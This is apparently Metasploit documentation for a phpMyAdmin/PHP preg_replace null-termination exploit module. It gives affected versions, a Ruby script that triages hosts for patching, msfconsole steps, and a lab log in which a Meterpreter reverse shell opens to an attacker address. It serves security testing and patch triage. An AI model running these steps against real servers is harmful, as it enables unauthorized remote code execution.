Description
This module exploits a vulnerability in PHP's preg_replace() function,
which is used by phpMyAdmin's replace table feature.
Vulnerable Application
PHP versions before 5.4.6 allow null termination of the preg_replace string parameter.
phpMyAdmin 4.6.x (prior to 4.6.3), 4.4.x (prior to 4.4.15.7), and 4.0.x (prior to 4.0.10.16) are affected.
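For patch triage, the version ranges above can be turned into an inventory check. The following is an added example, not part of the module or its documentation; the function names, verdict symbols and inventory rows are assumptions made for illustration.

```ruby
require 'rubygems' # Gem::Version gives correct dotted-version comparison

# Affected phpMyAdmin branches and their first fixed releases, as listed on this page.
PMA_FIXED = {
  '4.6' => Gem::Version.new('4.6.3'),
  '4.4' => Gem::Version.new('4.4.15.7'),
  '4.0' => Gem::Version.new('4.0.10.16')
}.freeze
# PHP releases before this one allow null termination of the preg_replace string parameter.
PHP_FIXED = Gem::Version.new('5.4.6')

# Parse the leading dotted-numeric part of a version banner, dropping
# distro suffixes such as "-1ubuntu4". Returns nil when no version is found.
def parse_version(text)
  m = text.to_s.strip.match(/\A\d+(?:\.\d+)+/)
  m && Gem::Version.new(m[0])
end

# :affected or :fixed for the listed branches; :review for unlisted branches
# older than 4.6.3 (the page's test scenario ran on 4.3.0); :not_listed otherwise.
def pma_status(version)
  v = parse_version(version)
  return :unknown if v.nil?
  fixed = PMA_FIXED[v.segments.first(2).join('.')]
  return (v < fixed ? :affected : :fixed) if fixed
  v < PMA_FIXED['4.6'] ? :review : :not_listed
end

# Combine both conditions from this page into one verdict per host.
# Assumption of this example: :fixed and :not_listed releases are not flagged.
def triage(pma_version, php_version)
  pma = pma_status(pma_version)
  php = parse_version(php_version)
  return :unknown if pma == :unknown || php.nil?
  return :ok unless %i[affected review].include?(pma)
  # phpMyAdmin still needs the update, but the PHP condition is not met.
  return :outdated unless php < PHP_FIXED
  pma == :affected ? :exposed : :review
end

# Constructed inventory rows (host names and versions are sample data).
INVENTORY = [
  ['web01', '4.6.2', '5.3.8'],
  ['web02', '4.3.0', '5.3.8'],
  ['web03', '4.0.10.15', '5.6.40-0+deb8u1'],
  ['web04', '4.6.3', '5.3.8']
].freeze

def report(rows = INVENTORY)
  rows.map { |host, pma, php| [host, triage(pma, php)] }.to_h
end
```

Hosts reported as `:exposed` or `:review` are the ones to update first; `:outdated` hosts still run an affected phpMyAdmin release on a PHP version that does not meet the null-termination condition.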
Options
DATABASE
This option specifies the database the module will use when creating a new table as part of the exploit.
Verification Steps
- Install vulnerable phpMyAdmin application
- Create database through phpMyAdmin application
- ./msfconsole
- use exploit/multi/http/phpmyadmin_null_termination_exec
- set USERNAME <username>
- set PASSWORD <password>
- set DATABASE <database>
- set rhost <rhost>
- run
Scenarios
Tested on Windows 7 x64 running phpMyAdmin 4.3.0 on PHP 5.3.8
msf > use exploit/multi/http/phpmyadmin_null_termination_exec
msf exploit(multi/http/phpmyadmin_null_termination_exec) > set rhost 172.22.222.122
rhost => 172.22.222.122
msf exploit(multi/http/phpmyadmin_null_termination_exec) > set database <database>
database => <database>
msf exploit(multi/http/phpmyadmin_null_termination_exec) > run
[*] Started reverse TCP handler on 172.22.222.177:4444
[*] Sending stage (37775 bytes) to 172.22.222.122
[*] Sleeping before handling stage...
[*] Meterpreter session 2 opened (172.22.222.177:4444 -> 172.22.222.122:49169) at 2018-06-18 07:28:19 -0500
[-] 172.22.222.122:80 - Failed to remove the table 'spkkw'
meterpreter > sysinfo
Computer : WIN-V438RLMESAE
OS : Windows NT 6.1 build 7601 (Windows 7 Business Edition Service Pack 1) i586
Meterpreter : php/windows